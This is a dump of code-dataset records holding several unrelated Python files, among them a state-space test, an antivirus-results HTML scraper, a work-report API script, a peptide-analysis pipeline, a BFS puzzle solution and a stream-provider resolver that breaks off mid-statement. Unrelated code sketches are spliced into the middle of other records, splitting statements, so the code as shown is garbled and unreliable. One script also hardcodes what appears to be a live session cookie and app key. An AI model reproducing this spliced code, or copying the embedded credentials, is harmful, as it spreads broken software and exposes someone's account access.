= [0.5, 0.5, 1]\n\n        self.ss2 = LinearStateSpace(A, C, G, mu_0=mu_0)\n\n    def tearDown(self):\n        del self.ss1\n        del 
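# A standard-library sketch of the hashing helpers in app/crypto.py above:
# hashlib produces the same SHA-256 hex digest as the cryptography package,
# and asyncio.run drives the coroutine. The function name here is
# illustrative, not part of the original module.
import asyncio
import hashlib

async def hash_sha256_stdlib(data):
    # hashing is CPU-bound; the coroutine only mirrors the original async signatures
    return hashlib.sha256(str.encode(data)).hexdigest()

print(asyncio.run(hash_sha256_stdlib("example")))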
self.ss2\n\n    def test_stationarity(self):\n        vals = self.ss1.stationary_distributions()\n        ssmux, ssmuy, sssigx, sssigy, sssigyx = vals\n\n        self.assertTrue(abs(ssmux - ssmuy) < 2e-8)\n        self.assertTrue(abs(sssigx - sssigy) < 2e-8)\n        self.assertTrue(abs(ssmux) < 2e-8)\n        self.assertTrue(abs(sssigx - self.ss1.C**2/(1 - self.ss1.A**2)) < 2e-8)\n        self.assertTrue(abs(sssigyx - self.ss1.G @ sssigx) < 2e-8)\n\n        vals = self.ss2.stationary_distributions()\n        ssmux, ssmuy, sssigx, sssigy, sssigyx = vals\n\n        assert_allclose(ssmux.flatten(), np.array([2.5, 2.5, 1]))\n        assert_allclose(ssmuy.flatten(), np.array([2.5]))\n        assert_allclose(\n            sssigx,\n            self.ss2.A @ sssigx @ self.ss2.A.T + self.ss2.C @ self.ss2.C.T\n        )\n        assert_allclose(sssigy, self.ss2.G @ sssigx @ self.ss2.G.T)\n        assert_allclose(sssigyx, self.ss2.G @ sssigx)\n\n    def test_simulate(self):\n        ss = self.ss1\n\n        sim = ss.simulate(ts_length=250)\n        for arr in sim:\n            self.assertTrue(len(arr[0]) == 250)\n\n    def test_simulate_with_seed(self):\n        ss = self.ss1\n\n        xval, yval = ss.simulate(ts_length=5, random_state=5)\n        expected_output = np.array([0.75, 0.69595649, 0.78269723, 0.73095776,\n                                    0.69989036])\n\n        assert_allclose(xval[0], expected_output)\n        assert_allclose(yval[0], expected_output)\n\n    def test_replicate(self):\n        xval, yval = self.ss1.replicate(T=100, num_reps=5000)\n\n        assert_allclose(xval, yval)\n        self.assertEqual(xval.size, 5000)\n        self.assertLessEqual(abs(np.mean(xval)), .05)\n\n    def test_replicate_with_seed(self):\n        xval, yval = self.ss1.replicate(T=100, num_reps=5, random_state=5)\n        expected_output = np.array([0.10498898, 0.02892168, 0.04915998,\n                                    0.18568489, 0.04541764])\n\n        assert_allclose(xval[0], expected_output)\n        assert_allclose(yval[0], expected_output)\n\n\n@raises(ValueError)\ndef test_non_square_A():\n    A = np.zeros((1, 2))\n    C = np.zeros((1, 1))\n    G = np.zeros((1, 1))\n\n    LinearStateSpace(A, C, G)\n\n\nif __name__ == '__main__':\n    suite = unittest.TestLoader().loadTestsFromTestCase(TestLinearStateSpace)\n    unittest.TextTestRunner(verbosity=2, stream=sys.stderr).run(suite)\n","sub_path":"quantecon/tests/test_lss.py","file_name":"test_lss.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"378369586","text":"doc = open('romeo.txt','r')\nlines = doc.readlines()\ngeneral_list = []\ndef fun_split(data):\n    line = data.split(' ')\n    for word in line:\n        # collect each word only the first time it is seen\n        if word not in general_list:\n            general_list.append(word)\n\n    return line\n\nfor line in lines:\n    fun_split(line)\n\n# def split_func(data):\n#     new_data =data.split(' ')\n\n","sub_path":"src/chapter 8/exercise 4.py","file_name":"exercise 4.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"450299775","text":"from .htmlparser import tree\nfrom .htmlparser.lex import LexHtml\nfrom .htmlparser.yacc import YaccHtml\nfrom ..exceptions import HtmlParserException\nimport logging\nimport re\n\n\ndef parse(html, sha256):\n    lexer = LexHtml()\n    parser = YaccHtml()\n    result = parser.build(data=html, lexer=lexer)\n    ret = _get_simple_info(result, sha256)\n    ret['Analysis'] = _get_antivirus_result(result, sha256)\n    ret.update(_get_detail_content(result, sha256))\n    ret.update(_get_additional_info(result, sha256))\n    return ret\n\n\ndef process_safe_log(func):\n    def f(results, sha256):\n        try:\n            return func(results, sha256)\n        except:\n            logging.warning(\"Problems with SHA256 \" + sha256 +
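# The exercise above collects unique words by hand; for comparison, a compact
# sketch of the same deduplication with dict.fromkeys, which keeps first-seen
# order. The sample lines are made up in place of romeo.txt.
sample_lines = ["But soft what light", "soft what light through yonder"]
unique_words = list(dict.fromkeys(w for line in sample_lines for w in line.split()))
print(unique_words)  # each word once, in order of first appearance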
If something is missing, please report it by Github Issues.\")\n return dict()\n # def no(results, sha256):\n # return func(results, sha256)\n return f\n\n\ndef _get_tag(dom, tags):\n d = dom.html.content\n\n for tag in tags:\n content = d.get_elements()\n found = False\n for i in content:\n if i.get_name() == tag[0]:\n params = i.get_params()\n if tag[1]:\n for param in params:\n if param == tag[1]:\n found = True\n break\n else:\n found = True\n if found:\n d = i.content\n break\n else:\n raise HtmlParserException('Cannot find ' + str(tag))\n return d\n\n\n@process_safe_log\ndef _get_antivirus_result(dom, sha256):\n antivirus_results = [\n ('body', None),\n ('div', ('class', 'wrapper')),\n ('div', ('class', 'container')),\n ('div', ('class', 'tab-content')),\n ('div', ('class', 'tab-pane active')),\n ('div', ('id', 'results')),\n ('div', ('id', 'active-tab')),\n ('table', ('id', 'antivirus-results'))\n ]\n result = []\n try:\n table = _get_tag(dom, antivirus_results).get_elements()\n names = []\n for header in table[0].get_content():\n for col in header.get_content():\n names.append(col.get_content()[0].strip())\n for i in table[1].get_content():\n antivirus = dict()\n for ind, j in enumerate(i.get_content()):\n elem = j.get_content()[0]\n if isinstance(elem, tree.HtmlTag):\n antivirus[names[ind]] = '-'\n else:\n antivirus[names[ind]] = elem.strip()\n result.append(antivirus)\n except HtmlParserException as e:\n logging.debug('Cannot scrap antivirus results (' + str(e) + ')')\n return result\n\n\n@process_safe_log\ndef _get_detail_content(dom, sha256):\n tags = [\n ('body', None),\n ('div', ('class', 'wrapper')),\n ('div', ('class', 'container')),\n ('div', ('class', 'tab-content')),\n ('div', ('id', 'item-detail')),\n ('div', ('id', 'item-detail-content')),\n ('div', ('id', 'file-details'))\n ]\n result = dict()\n try:\n html_list = _get_tag(dom, tags).get_elements()\n while html_list[0].get_name() != 'h5':\n html_list.pop(0)\n\n part_name = None\n\n for i in html_list:\n if i.get_name() == 'h5':\n part_name = i.get_content()[1]\n result[part_name] = dict()\n else:\n if i.get_params()[0] == ('class', 'enum-container'):\n elems = i.get_content()\n if elems[0].get_params()[0] == ('class', 'enum'):\n for elem in elems:\n try:\n tmp1 = elem.get_content()\n key = tmp1[0].get_content()\n value = tmp1[1] if len(tmp1) > 1 else \"\"\n if isinstance(value, tree.HtmlTag):\n value = value.get_content()[0]\n key = key[0].replace('\\n', ' ').strip()\n value = value.replace('\\n', ' ').strip()\n result[part_name][key] = value\n except Exception:\n pass # There is a problem with key or value, probably null.\n if elems[0].get_params()[0] == ('class', 'expand-canvas'):\n for elem in elems:\n line = elem.get_content()\n key = line[0].get_content()[0].get_content()[0].replace('[+] ', '')\n value = []\n for v in line[1].get_content():\n value.append(v.get_content()[0])\n result[part_name][key] = value\n if i.get_params()[0] == ('class', 'expandable'):\n elems = i.get_content()\n value = []\n for elem in elems:\n if elem.get_name() == 'div':\n value.append(elem.get_content()[0])\n result[part_name] = value\n if i.get_params()[0] == ('class', 'enum-container expandable'):\n elems = i.get_content()\n names = list()\n part_result = list()\n for column in elems[0].get_content():\n names.append(column.get_content()[0])\n for line in elems[1:]:\n try:\n part = dict()\n for ind, column in enumerate(line.get_content()):\n if column.get_name() == 'div':\n extended_dict = dict()\n for ex in column.get_content():\n key 
= ex.get_content()[0].get_content()[0]\n value = ex.get_content()[1].strip()\n extended_dict[key] = value\n part[\"Extended\"] = extended_dict\n else:\n elem = column.get_content()\n elem = elem[0] if len(elem) > 0 else '-'\n if isinstance(elem, tree.HtmlTag):\n elem = elem.get_content()[0]\n if isinstance(elem, tree.HtmlTag):\n continue\n part[names[ind]] = elem.strip()\n part_result.append(part)\n except AttributeError:\n pass\n result[part_name] = part_result\n except HtmlParserException as e:\n logging.debug('Cannot scrap detail content (' + str(e) + ')')\n\n return result\n\n\n@process_safe_log\ndef _get_additional_info(dom, sha256):\n tags = [\n ('body', None),\n ('div', ('class', 'wrapper')),\n ('div', ('class', 'container')),\n ('div', ('class', 'tab-content')),\n ('div', ('id', 'additional-info')),\n ('div', ('id', 'additional-info-content')),\n ('div', ('id', 'file-details'))\n ]\n\n result = dict()\n try:\n html_list = _get_tag(dom, tags).get_elements()\n for elem in html_list:\n if elem.get_name() == 'h5':\n part_name = elem.get_content()[1]\n result[part_name] = dict()\n else:\n for i in elem.get_content():\n try:\n t = i.get_content()\n if t[0].get_name() == 'span':\n key = t[0].get_content()[0].strip()\n value = t[1]\n while isinstance(value, tree.HtmlTag):\n value = value.get_content()[0]\n result[part_name][key] = re.sub(r\"\\s+\", ' ', value)\n if t[0].get_name() == 'div':\n key = t[0].get_content()[0].strip()\n value = t[1].get_content()[0]\n if isinstance(value, tree.HtmlTag):\n tmp = t[1].get_content()\n value = []\n for nested in tmp:\n value.append(re.sub(r\"\\s+\", ' ', nested.get_content()[0]))\n else:\n value = re.sub(r\"\\s+\", ' ', value)\n result[part_name][key] = value\n if t[0].get_name() == 'table':\n rows = t[0].get_content()[0].get_content()\n key = rows[0].get_content()[0]\n value = []\n for elem in rows[1].get_content():\n if isinstance(elem, str):\n value.append(elem)\n result[part_name][key] = value\n except Exception:\n # Some problems with values\n pass\n\n except HtmlParserException as e:\n logging.debug('Cannot scrap additional info + (' + str(e) + ')')\n\n return result\n\n\n@process_safe_log\ndef _get_simple_info(dom, sha256):\n tags = [\n ('body', None),\n ('div', ('class', 'wrapper')),\n ('div', ('class', 'container')),\n ('div', ('class', 'frame')),\n ('div', ('id', 'basic-info')),\n ('div', ('class', 'row')),\n ('div', ('class', 'span8 columns')),\n ('table', None),\n ('tbody', None)\n ]\n result = dict()\n try:\n html_list = _get_tag(dom, tags).get_elements()\n for row in html_list:\n elem = row\n key = elem.get_content()[0].get_content()[0][:-1]\n value = re.sub(r\"\\s+\", ' ', elem.get_content()[1].get_content()[0])\n result[key] = value\n\n except HtmlParserException as e:\n logging.debug('Cannot scrap basic info (' + str(e) + ')')\n\n return result\n","sub_path":"src/scrapper/parsers/html.py","file_name":"html.py","file_ext":"py","file_size_in_byte":10309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"501952088","text":"import requests\nimport json\nimport datetime\n\nif __name__ == '__main__':\n pay_load = '''{\"pageSize\":100,\"newTemplateInstanceId\":\"5da3ce37c0a38a3cfcfd6d27\",\"oldTemplateInstanceId\":null,\"type\":\"next\",\"isDraftId\":false}'''\n resp = requests.post('https://www.yunzhijia.com/workreport/rest/v1/personal/reports',\n cookies = {\"webLappToken\": 
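# A stripped-down sketch of the process_safe_log pattern used throughout the
# scraper above: a decorator that converts any failure in one section into a
# logged warning plus an empty dict, so a single malformed section cannot
# abort the whole parse. The section function below is a stand-in.
import logging

def safe_section(func):
    def wrapper(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except Exception:
            logging.warning("section %s failed; returning an empty result", func.__name__)
            return dict()
    return wrapper

@safe_section
def parse_section():
    raise ValueError("malformed markup")  # simulated scraping failure

print(parse_section())  # -> {} plus a warning, instead of a crash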
\"RTXcirUwxXcUaI%2B4Yz71zl2OZ1%2BmGbP6GP%2BHFg7QJ1Mp5JoXqpGLlzJqoSSEG4ILrKKbkg%2BGU4hF0GROw8%2BJtMEtbznAiE2XhQXey1tZjrOYMHuAZ79dJrUnu4TQNqNE\"\n ,\"lappKey\": \"lightapp_5c1a1c0d1248c3a55d1b6036590b0b59\"\n },\n data=pay_load,\n )\n result_json = json.loads(resp.text)\n infos = []\n for report in result_json['data']['reports']:\n widgetMap = report['formVo']['widgetMap']\n report_type = widgetMap['_S_TITLE']['value']\n report_head = ''\n report_date = datetime.datetime.utcfromtimestamp(widgetMap['_S_REPORT_TIME']['value']/1000)\n dt = datetime.datetime.utcfromtimestamp(widgetMap['_S_DATE']['value']/1000)\n if 'Te_1' in widgetMap:\n report_head = widgetMap['Te_1']['value']\n else:\n report_head = widgetMap['Te_0']['value']\n infos.append((report_type, report_head, report_date, dt))\n\n for report_type, report_head, report_date, dt in infos:\n print(report_type, report_head, report_date.strftime('%Y-%m-%d'), dt.strftime('%Y-%m-%d'), sep='\\t')\n\n # print(infos)","sub_path":"xl/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"476188283","text":"import os\n\nfrom molseqcollection_class import MolSeqCollection\nimport metacats_parser\nfrom count_sites_in_window import count_targets_in_sliding_windows_filter_by_threshold\nfrom count_sites_in_window import merge_contiguous_windows\nfrom plot_bar_graph import plot_bar_from_window_tuple_list\nfrom get_peptides import print_peptide_aln_from_merged_window_counts\n\nclass DiagnosticPeptides(object):\n \"\"\"\n From metacats output, identify diagnostic peptides\n \"\"\"\n def __init__(self, sensitivity_specificity_threshold=0.95, window_size=15, diagnostic_position_count_threshold=3):\n self.sensitivity_specificity_threshold = sensitivity_specificity_threshold\n self.window_size = window_size\n self.diagnostic_position_count_threshold = diagnostic_position_count_threshold\n\n def get_sensitivity_specificity_threshold(self):\n return self.sensitivity_specificity_threshold\n\n def set_sensitivity_specificity_threshold(self, threshold):\n self.sensitivity_specificity_threshold = threshold\n\n def get_diagnostic_position_count_threshold(self):\n return self.diagnostic_position_count_threshold\n\n def set_diagnostic_position_count_threshold(self, threshold):\n self.diagnostic_position_count_threshold = threshold\n\n def get_window_size(self):\n return self.window_size\n\n def set_window_size(self, size):\n self.window_size = size\n\n def metacats_to_diagnostic_peptides(self, alignment, input_directory, target_file_suffix, output_directory):\n # prepare directories for output files\n try:\n os.mkdir(output_directory + '/sensitivity_specificity')\n output_directory_ss = output_directory + '/sensitivity_specificity/'\n\n os.mkdir(output_directory + '/sliding_windows')\n output_directory_sliding = output_directory + '/sliding_windows/'\n\n os.mkdir(output_directory + '/graphs')\n output_directory_graphs = output_directory + '/graphs/'\n\n os.mkdir(output_directory + '/peptides')\n output_directory_peptides = output_directory + '/peptides/'\n except IOError:\n print(\"directory exists\")\n\n aln = MolSeqCollection.parse(alignment, is_aligned=True, remove_gaps=False, allow_duplicate_labels=True)\n alignment_length = aln.get_length()\n\n for file in os.listdir(input_directory):\n filename = os.fsdecode(file)\n if filename.endswith(target_file_suffix):\n print(\"\\n\" + filename)\n\n # remove suffix from filename\n filename_input = 
filename[: -len(target_file_suffix)]\n\n print(\"\\nappending sensitivity and specificity to metacats file\")\n filename_ss = filename_input + \"_sensitivity_specificity\"\n metacats_parser.append_sensitivity_specificity(input_directory + filename, output_directory_ss + filename_ss)\n\n print(\"\\nfiltering sensitivity and specificity file by threshold \" + str(self.sensitivity_specificity_threshold))\n sensitivity_index = 7\n specificity_index = 8\n filename_ss_filtered = filename_ss + str(self.sensitivity_specificity_threshold).replace(\".\", \"\") # 0.95 -> 095\n position_list = metacats_parser.filter_metacats_by_threshold(output_directory_ss + filename_ss,\n output_directory_ss + filename_ss_filtered, sensitivity_index, specificity_index, self.sensitivity_specificity_threshold)\n\n print(\"\\nusing a sliding window of size \" + str(self.window_size) + \", counting the number of diagnostic positions in each window\")\n filename_ss_filtered_window_position_count = filename_ss_filtered + \"_window_position_counts\"\n all_windows_list = count_targets_in_sliding_windows_filter_by_threshold(position_list, alignment_length,\n self.window_size,\n output_directory_sliding + filename_ss_filtered_window_position_count)\n\n print(\"\\nfiltering sliding windows by threshold \" + str(self.diagnostic_position_count_threshold))\n filename_ss_filtered_window_position_count_threshold = filename_ss_filtered + \"_window_position_counts_equal_larger_\" + str(self.diagnostic_position_count_threshold)\n filtered_windows_list = count_targets_in_sliding_windows_filter_by_threshold(position_list, alignment_length,\n self.window_size,\n output_directory_sliding + filename_ss_filtered_window_position_count_threshold, self.diagnostic_position_count_threshold)\n\n print(\"\\nmerging filtered sliding windows with contiguous start positions\")\n filename_ss_filtered_window_position_count_threshold_merged_windows = filename_ss_filtered_window_position_count_threshold\n merge_contiguous_windows(filtered_windows_list, self.window_size, alignment_length, output_directory_sliding + filename_ss_filtered_window_position_count_threshold_merged_windows)\n\n print(\"\\nplotting counts of diagnostic positions in sliding windows\")\n x_min = 0\n x_max = alignment_length\n y_min = 0\n y_max = 15\n xticks = 2000\n plot_bar_from_window_tuple_list(all_windows_list, output_directory_graphs + filename_ss_filtered + \".png\", x_min, x_max, y_min, y_max, xticks, self.diagnostic_position_count_threshold)\n\n print(\"\\ngetting diagnostic peptide alignments\")\n print_peptide_aln_from_merged_window_counts(alignment, output_directory_sliding + filename_ss_filtered_window_position_count_threshold_merged_windows, output_directory_peptides)\n print(\"-------------------------------------------------------------------------------------------------\")\n\n def get_diagnostic_sites_in_range(self, infile, outfile, start, end):\n with open(infile, 'r') as in_file, open(outfile, 'w') as out_file:\n count = 0\n first = True\n for line in in_file:\n line = line.strip()\n\n if line:\n if first:\n first = False\n out_file.write(line + '\\n')\n else:\n position = int(line.split('\\t')[0])\n if position >= start and position <= end:\n out_file.write(line + '\\n')\n count += 1\n print('# diagnostic sites found ', count)\n return\n\n\nif __name__ == '__main__':\n\n\n corona_aln = '/Users/yuzhang/Documents/2019nCov/evolution/vipr_gisaid_ncov_full_genomes_20200306_cdhit_1_plus_refs_blast_Richard_cdhit_098_fft_trimmed.fasta'\n input_directory = 
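# A toy, self-contained sketch of the sliding-window step described in
# metacats_to_diagnostic_peptides above: slide a fixed-size window over the
# alignment and keep windows containing at least `threshold` diagnostic
# positions. All numbers below are invented for illustration.
def windows_with_min_hits(positions, aln_length, window, threshold):
    hits = set(positions)
    kept = []
    for start in range(aln_length - window + 1):
        count = sum(1 for p in range(start, start + window) if p in hits)
        if count >= threshold:
            kept.append((start, count))  # (window start, diagnostic positions inside)
    return kept

print(windows_with_min_hits([3, 5, 7, 20], aln_length=30, window=10, threshold=3))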
'/Users/yuzhang/Documents/2019nCov/diagnosis/'\n    target_file_suffix = '.tsv'\n    output_directory = '/Users/yuzhang/Documents/2019nCov/diagnosis/'\n    dp = DiagnosticPeptides()\n    dp.set_sensitivity_specificity_threshold(1.0)\n    dp.set_diagnostic_position_count_threshold(8)\n    dp.metacats_to_diagnostic_peptides(corona_aln, input_directory, target_file_suffix, output_directory)\n    '''\n    dp = DiagnosticPeptides()\n    dp.get_diagnostic_sites_in_range('/Users/yuzhang/Documents/2019nCov/diagnosis/window15_threshold8_ss_099/sensitivity_specificity/ncov_subtree_vs_sars_pre2016_subtree_sensitivity_specificity',\n                                     '/Users/yuzhang/Documents/2019nCov/diagnosis/CDC_primers/2019-nCoV_N1-P_diagnostic_sites.txt', 28956, 28979)\n    dp.get_diagnostic_sites_in_range('/Users/yuzhang/Documents/2019nCov/diagnosis/window15_threshold8_ss_099/sensitivity_specificity/ncov_subtree_vs_sars_pre2016_subtree_sensitivity_specificity',\n                                     '/Users/yuzhang/Documents/2019nCov/diagnosis/CDC_primers/2019-nCoV_N2-P_diagnostic_sites.txt', 29835, 29857)\n    dp.get_diagnostic_sites_in_range('/Users/yuzhang/Documents/2019nCov/diagnosis/window15_threshold8_ss_099/sensitivity_specificity/ncov_subtree_vs_sars_pre2016_subtree_sensitivity_specificity',\n                                     '/Users/yuzhang/Documents/2019nCov/diagnosis/CDC_primers/2019-nCoV_N3-P_diagnostic_sites.txt', 29351, 29374)\n\n\n    EV_099_aln = '/Users/yuzhang/Documents/Enterovirus_diagnosis/cd-hit_results/enterovirus_diagnosis_target_types_complete_human_polyproteins_subtract_patent_385_cdhit_099_E-INS-i.fasta'\n    input_directory = '/Users/yuzhang/Documents/Enterovirus_diagnosis/testing/'\n    target_file_suffix = '.tsv'\n    output_directory = '/Users/yuzhang/Documents/Enterovirus_diagnosis/testing/'\n    dp = DiagnosticPeptides()\n    dp.metacats_to_diagnostic_peptides(EV_099_aln, input_directory, target_file_suffix, output_directory)\n    '''\n","sub_path":"diagnostic_peptides.py","file_name":"diagnostic_peptides.py","file_ext":"py","file_size_in_byte":9051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"411345525","text":"class RangeSumMatrix:\r\n    def __init__(self, matrix):\r\n        self.res = []\r\n        self.n = len(matrix)\r\n        self.m = len(matrix[0])\r\n\r\n        self.res = [[0] * self.m for i in range(self.n)]\r\n\r\n        for i0 in range(self.n):\r\n            for j0 in range(self.m):\r\n                # res holds the sum from matrix[i0][j0] to matrix[n][m]\r\n                i = self.n - 1 - i0\r\n                j = self.m - 1 - j0\r\n                self.res[i][j] = matrix[i][j]\r\n                if (i == self.n - 1 and j == self.m - 1): continue\r\n                if (i != self.n - 1):\r\n                    self.res[i][j] += self.res[i + 1][j]\r\n                if (j != self.m - 1):\r\n                    self.res[i][j] += self.res[i][j + 1]\r\n                if (i != self.n - 1 and j != self.m - 1):\r\n                    self.res[i][j] -= self.res[i + 1][j + 1]\r\n\r\n        return None\r\n\r\n    def total(self, row0, col0, row1, col1):\r\n        s = self.res[row0][col0]\r\n        if (col1 != self.m - 1):\r\n            s -= self.res[row0][col1 + 1]\r\n\r\n        if (row1 != self.n - 1):\r\n            s -= self.res[row1 + 1][col0]\r\n\r\n        if (col1 != self.m - 1 and row1 != self.n - 1):\r\n            s += self.res[row1 + 1][col1 + 1]\r\n        return s","sub_path":"Q790_Range_Query_on_Two_Dimensional_List.py","file_name":"Q790_Range_Query_on_Two_Dimensional_List.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"349989439","text":"# Spread from two diffusers\n# 5:18 PM 2021-05-03\n# type : bfs\n# summary\n# use willbevisited together with the matrix to spot cells that are not walls yet never get reached, which decides whether full diffusion is possible\n# if full diffusion is possible, store the maximum cost reached by the bfs separately and print it\n\n# lesson 1 ; 
two diffusers operate on a single costmatrix, so always update it with the minimum value!\n# at first I declared one matrix per diffuser, as when solving the carpenter's maze escape, but handling a single matrix with minimum-value updates\n# simplifies the later step of merging two cost matrices by taking the per-cell minimum\n# above all, the carpenter's maze escape could probably be solved the same way\n\n# tcp 1 ; if two isolated regions each contain a diffuser, only one bfs's willbevisited survives and the check breaks\n# Sol) share a common visited, allow up to two visits, and later exclude cells marked 1 or 2 when judging complete coverage\n# but that way, even within a single bfs, reaching the same cell from different directions corrupts the cost update\n# sol) so keep a combined visited (totalwillbevisited) instead.\n\nimport sys\nfrom collections import deque\n\nglobal N,M\nglobal matrix, willbevisited, totalwillbevisited,costMatrix\nglobal maxCost\n\n# the costmatrix is rewritten by two bfs runs, so each run's own max cost is not valid\n# and we need a separate function to find the true maximum\ndef findMaxCost():\n    global N,M\n    global costMatrix\n    global maxCost\n\n    maxCost=0\n    for r in range(N):\n        for c in range(M):\n            if(costMatrix[r][c]==' '): pass\n            elif(costMatrix[r][c]>maxCost):\n                maxCost=costMatrix[r][c]\n\ndef check_PerfectDiffuse():\n    global matrix,totalwillbevisited\n\n    for r,row in enumerate(totalwillbevisited):\n        for c, item in enumerate(row):\n            if(item == 0 and matrix[r][c] !=1):\n                return 0\n    return 1\n\ndef bfs_deffuser(v):\n    global N,M\n    global matrix, willbevisited, totalwillbevisited,costMatrix\n    global maxCost\n    q=deque()\n    cost=0\n    q.append((v[0],v[1],cost))\n\n    while(q):\n        curR, curC, curCost = q.popleft()\n        # print(curR,curC)\n        totalwillbevisited[curR][curC]=1\n        willbevisited[curR][curC]=1\n\n        # assign on the first visit; otherwise keep the smaller cost\n        if(costMatrix[curR][curC]==' '):\n            costMatrix[curR][curC]=curCost\n        else:\n            if(curCost<costMatrix[curR][curC]):\n                costMatrix[curR][curC]=curCost\n\n        cost=curCost+1\n        for dr,dc in ((-1,0),(1,0),(0,-1),(0,1)):\n            adjR=curR+dr\n            adjC=curC+dc\n            if(adjR<0 or adjR>(N-1) or adjC<0 or adjC>(M-1)): continue\n\n            if(matrix[adjR][adjC]==1): continue\n\n            if(willbevisited[adjR][adjC]==1): continue\n            else:\n                totalwillbevisited[adjR][adjC]=1\n                willbevisited[adjR][adjC]=1\n                q.append((adjR,adjC,cost))\n\nif __name__==\"__main__\":\n    N,M = map(int, sys.stdin.readline().split())\n    \n    matrix=[]\n    coord_diffuser=[]\n\n    for r in range(N):\n        row=list(map(int, sys.stdin.readline().split()))\n        matrix.append(row)\n\n        for c,item in enumerate(row):\n            if(item == 2):\n                coord_diffuser.append((r,c))\n    \n    costMatrix=[[' ']*M for _ in range(N)]\n    totalwillbevisited=[[0]*M for _ in range(N)]\n\n    for v in coord_diffuser:\n        willbevisited=[[0]*M for _ in range(N)]\n        bfs_deffuser(v)\n        # print(*willbevisited, sep='\\n')\n\n    # for row in costMatrix:\n    #     print(' '.join(map(str,row)))\n\n    findMaxCost()\n    # print(maxCost)\n\n    if(check_PerfectDiffuse()):\n        print(maxCost)\n    else:\n        print(-1)\n","sub_path":"PSrecords_python/PSpool/skm/210503deffuser/04Twospread.py","file_name":"04Twospread.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"90285463","text":"# -*- coding: utf-8 -*-\r\nimport re\r\n\r\nfrom Lib.RequestHelper import requestHelper\r\n\r\n\r\n# Internal dictionary of \"mostly\" supported providers, each key is a provider name, each value is a\r\n# set of variant names for each provider. 
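# The solution above runs one BFS per diffuser and merges costs with min();
# a common alternative is a single multi-source BFS that seeds every diffuser
# at cost 0 and yields the per-cell minimum directly. A sketch on a made-up
# grid (0 = empty, 1 = wall, 2 = diffuser), with -1 marking unreached cells:
from collections import deque

def multi_source_bfs(grid):
    n, m = len(grid), len(grid[0])
    dist = [[-1] * m for _ in range(n)]
    q = deque()
    for r in range(n):
        for c in range(m):
            if grid[r][c] == 2:
                dist[r][c] = 0  # every diffuser enters the queue at cost 0
                q.append((r, c))
    while q:
        r, c = q.popleft()
        for dr, dc in ((1, 0), (-1, 0), (0, 1), (0, -1)):
            nr, nc = r + dr, c + dc
            if 0 <= nr < n and 0 <= nc < m and grid[nr][nc] != 1 and dist[nr][nc] == -1:
                dist[nr][nc] = dist[r][c] + 1
                q.append((nr, nc))
    return dist

print(multi_source_bfs([[2, 0, 0], [1, 1, 0], [0, 0, 2]]))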
 All these variants come up in the URLs...\r\n_SUPPORTED_PROVIDERS = {\r\n    'VIDEOZOO.ME': set(('videozoo.me', 'videozoome', 'videozoo')),\r\n    'PLAY44.NET': set(('play44.net', 'play44net', 'play44')),\r\n    'EASYVIDEO.ME': set(('easyvideo.me', 'easyvideome', 'easyvideo')),\r\n    'PLAYBB.ME': set(('playbb.me', 'playbbme', 'playbb')),\r\n    'PLAYPANDA.NET': set(('playpanda.net', 'playpandanet', 'playpanda')),\r\n    'VIDEOWING.ME': set(('videowing.me', 'videowingme', 'videowing'))\r\n}\r\n# Resolving not available for these right now, they need to be researched on how to solve:\r\n# 'cheesestream.com', '4vid.me', 'video66.org', 'videobug.net', 'videofun.me', 'vidzur.com'.\r\n\r\n\r\ndef getEpisodeProviders(api, episodeID):\r\n    '''\r\n    :returns: A dict where each key is a provider name and each value is a list of\r\n    lists of stream URLs from that same provider.\r\n    \r\n    Usually each provider list has a single stream list, but in some rare cases there's more than\r\n    one set of streams for the same provider.\r\n    '''\r\n    requestHelper.setAPISource(api)\r\n    requestHelper.delayBegin()\r\n    jsonData = requestHelper.routeGET('/GetVideos/' + episodeID)\r\n    requestHelper.delayEnd(1000)\r\n\r\n    if not jsonData:\r\n        return None\r\n\r\n    if isinstance(jsonData[0], dict):\r\n        # Special-case for animeplus, URLs might come inside one dictionary each provider.\r\n        providerURLs = (providerURL['url'] for providerURL in jsonData)\r\n    elif isinstance(jsonData[0], list):\r\n        # Or the JSON data is a list of lists (sometimes w/ mixed providers in the same list...).\r\n        providerURLs = (url for urlList in jsonData for url in urlList)\r\n    else:\r\n        providerURLs = jsonData # A list of single providers?\r\n\r\n    # Assume the video parts of the same provider will be in order (eg. easyvideo part 1, easyvideo part 2 , 3 etc.).\r\n\r\n    providers = { } # Parent dict of providers, this is what's returned.\r\n    lastURLs = [ ]\r\n    lastProvider = ''\r\n\r\n    for url in providerURLs:\r\n        # Try to get the provider name from the URL to see if we support resolving it.\r\n        if url.startswith('http://'):\r\n            tempURL = url.replace('http://', '')\r\n        elif url.startswith('https://'):\r\n            tempURL = url.replace('https://', '')\r\n        else:\r\n            tempURL = url # No scheme prefix; use the URL as-is.\r\n\r\n        providerName = next(\r\n            (\r\n                key\r\n                for word in tempURL.split('.')\r\n                for key in _SUPPORTED_PROVIDERS.iterkeys() if word in _SUPPORTED_PROVIDERS[key]\r\n            ),\r\n            None\r\n        )\r\n        if not providerName:\r\n            continue # It's not a supported provider (or we failed finding its name).\r\n\r\n        # Accumulate consecutive URLs from the same provider in a list, until the provider name changes.\r\n        if providerName != lastProvider:\r\n            if lastURLs: # Store the list in the dict, if it has any items.\r\n                if lastProvider in providers:\r\n                    providers[lastProvider].append(lastURLs) # In case of non-consecutive lists of the same provider.\r\n                else:\r\n                    providers[lastProvider] = [ lastURLs ]\r\n            lastURLs = [ ]\r\n            lastProvider = providerName\r\n\r\n        lastURLs.append(url)\r\n\r\n    # Store the list accumulated for the final provider as well.\r\n    if lastURLs:\r\n        if lastProvider in providers:\r\n            providers[lastProvider].append(lastURLs)\r\n        else:\r\n            